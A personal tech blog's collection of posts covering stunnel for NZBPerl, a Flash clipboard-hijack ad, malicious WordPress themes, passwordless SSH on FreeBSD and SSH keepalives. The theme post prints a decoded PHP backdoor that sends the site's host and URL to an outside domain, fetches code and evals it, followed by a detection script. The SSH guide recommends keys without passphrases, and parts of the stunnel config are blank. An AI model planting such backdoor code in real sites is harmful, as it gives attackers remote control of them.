NZBPerl and SSL (using stunnel4)

SSL is a fairly recent addition (seemingly) to the usenet client arena; most clients that support it have only added support within the past two years or so. I’m giving NZBPerl a try, mostly because it’s the only one that fits in natively with Torrentflux b4rt. NZBPerl “technically” supports SSL (with the –ssl switch), but in practice it hangs and never really accomplishes its tasks. It’s all over teh interwebs that NZBPerl doesn’t quite work with SSL, but since the author last released in late 2006, it’s not likely to see an update to properly support SSL.

I spent about 4 hours over the weekend playing around with the source to no avail. If I could find a working patch, I would have applied it and submitted it upstream… that would have been ideal of course.

So I instead used the haxy method: wrap the non-SSL NNTP requests in stunnel, effectively accomplishing the same goal. Here is the setup I used in Ubuntu:

# superuser assumed
apt-get install stunnel4
vim /etc/stunnel/snntp.conf
# put in the following
accept  =
connect = SECURE_NEWS_SERVER:563
# /put
stunnel4 /etc/stunnel/snntp.conf 1>>/var/log/stunnel.log 2>&1 &

Then in Torrentflux-b4rt, enable NZBPerl (ensuring prereqs match first), set the server hostname to, add your username/password to the list, and give it a try. Of course inspect /var/log/stunnel.log if there are any issues. Worked like a charm for me.


Flash Clipboard Hijack

Apparently there are some malicious Adobe Flash ads out there that can hijack your browser clipboard. The issue affects Linux, Windows and OS X; Firefox, Safari and Internet Explorer — basically any client that relies on the Adobe Flash plugin. If you don’t believe it, check out the proof of concept (you have been warned). That particular site hijacks your clipboard with “http://evil.com”.

I saw this today when my browser (Firefox 3.0.1 — latest on Windows XP — patched) wouldn’t let me copy and paste text. I got the same potentially malicious [http://windowsxp-privacy.com/?id=…] result every time I CTRL-V’d. After some digging around, I realized that it was localized to my browser (I thought for sure it was a system issue at first), so to fix the issue, I closed the browser and re-opened it. The issue was resolved.

Considering the manual effort required to update Flash, combined with the fact that I usually only install Flash when a computer is built and never update it, this leads me to believe this issue is widespread and not going to be fixed anytime soon. It’s a minor annoyance, but still, a pretty neat little exploit.


WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper, and saw this in his theme’s header.php (I added the newlines for displaying purposes)

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with the newlines)

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
  $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
  $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
else
  $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
@eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;');
if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {
  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
  $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);
  @eval($R3E33E017CD76B9B7E6C7364FB91E2E90);
} else {
  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);
  @readfile($R6E4F14B335243BE656C65E3ED9E1B115);
}

Classic arbitrary code execution attack, behind a few levels of masking.

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php


Which doesn’t turn out to be as bad, only a few links (run it yourself if you’re interested, I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposefully omitted, they don’t need any more pagerank. Who knew people were so shady. I urge those looking to get WordPress Themes to stay away from sites such as these.

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.
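To check an installed set of themes for the eval(base64_decode(...)) pattern shown in this post, the following added example (not code from the original post) lists every PHP line that evals a base64-decoded string and decodes the literal for reading without running it as PHP. The function names scan_themes and decode_payloads are hypothetical, and the directory you pass in is whatever holds your themes.

```shell
#!/usr/bin/env bash
# Added example: locate eval(base64_decode('...')) in theme files and decode
# the payload so it can be read. Nothing here executes the payload as PHP.

# scan_themes DIR
# Print "file:line" for every PHP line that evals a base64-decoded string.
# The pattern also matches the "@eval(@base64_decode(" form from header.php.
scan_themes() {
    find "$1" -type f -name '*.php' -exec grep -nHE \
        'eval[[:space:]]*\([[:space:]]*@?base64_decode[[:space:]]*\(' {} + |
        cut -d: -f1,2
}

# decode_payloads FILE
# Print the decoded text of each base64 literal passed to base64_decode().
# Line breaks are removed first, so a literal that was wrapped across lines
# (as in the listing above) is rejoined before decoding.
decode_payloads() {
    tr -d '\r\n' < "$1" |
        grep -oE "base64_decode[[:space:]]*\([[:space:]]*['\"][A-Za-z0-9+/=]+['\"]" |
        sed -E "s/^[^'\"]*['\"]//; s/['\"]\$//" |
        while IFS= read -r blob; do
            printf '%s' "$blob" | base64 -d 2>/dev/null || echo '[undecodable]'
            echo
        done
}
```

Run scan_themes against the themes directory, then decode_payloads on each file it reports.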


How to SSH w/o a password on FreeBSD

This guide, adapted from a Berkeley guide, shows how to SSH from Unix or Linux boxes (e.g. FreeBSD) without having to repeatedly enter the password.

First step, on the client do the following:

mkdir -p ~/.ssh
chmod 700 ~/.ssh
ssh-keygen -t rsa

Have it use the default location (~/.ssh/id_rsa), and make sure there is no passphrase. This creates a file containing the private key (id_rsa) and a file containing the public key (id_rsa.pub).

There should be one line of text in id_rsa.pub. Copy it to the server, putting it in ~/.ssh/authorized_keys2. Then execute this command:

chmod 600 ~/.ssh/authorized_keys2

That’s it! Now connect from the client to the server with this command:

ssh server

If that doesn’t work (i.e. it prompts for your password), you may have to try a few things. On one box that I tried, it worked as above. On another, I had to do the following.

ssh -i ~/.ssh/id_rsa server

If that works, create ~/.ssh/config if it does not already exist and add these two lines to it:

Host server
    IdentityFile ~/.ssh/id_rsa

If you SSH as much as I do, this can save lots of time.
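The server-side step above (copy the public key, then chmod 600) can be scripted so that it refuses a private key by mistake and sets the permissions itself. This is an added example, not part of the original guide; install_pubkey is a hypothetical helper, and it writes to authorized_keys2 only because that is the file name this post uses.

```shell
#!/usr/bin/env bash
# Added example: install_pubkey is a hypothetical helper, run on the server.

# install_pubkey PUBFILE [SSH_DIR]
# Appends the key in PUBFILE to SSH_DIR/authorized_keys2.
# Returns 2 if PUBFILE is a private key or is not a one-line public key;
# returns 0 after installing the key or if it is already present.
install_pubkey() {
    local pub=$1 dir=${2:-$HOME/.ssh} auth key
    auth=$dir/authorized_keys2

    # id_rsa (without .pub) is the private half and must stay on the client.
    if grep -q 'PRIVATE KEY' "$pub"; then
        echo "refusing: $pub is a private key" >&2
        return 2
    fi

    # A public key file holds exactly one line: "<type> <base64> [comment]".
    key=$(cat "$pub")
    if [ "$(grep -c . "$pub")" -ne 1 ]; then
        echo "refusing: $pub is not a single-line public key" >&2
        return 2
    fi
    case $key in
        ssh-rsa\ AAAA*|ssh-ed25519\ AAAA*|ecdsa-sha2-*\ AAAA*) ;;
        *) echo "refusing: $pub is not a public key" >&2; return 2 ;;
    esac

    # sshd ignores key files that other users can write to, so fix the
    # permissions before touching the file.
    mkdir -p "$dir" && chmod 700 "$dir"
    touch "$auth" && chmod 600 "$auth"

    # -x whole line, -F fixed string: never add the same key twice.
    grep -qxF -- "$key" "$auth" || printf '%s\n' "$key" >> "$auth"
}
```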


FreeBSD SSH session timeouts

I was tired of seeing this while logging into my server via SSH:

Read from remote host raybdbomb.com: Connection reset by peer

I messed around with the sshd config a bit and wasn’t able to get it to go away. I’m pretty sure that the connection is being closed by some firewall in the interim. So for a solution, I installed spinner.

cd /usr/ports/sysutils/spinner/
make install clean

It puts a character on the top left of the console, which keeps the session alive with minimal amounts of data transfer.

Works great! 🙂
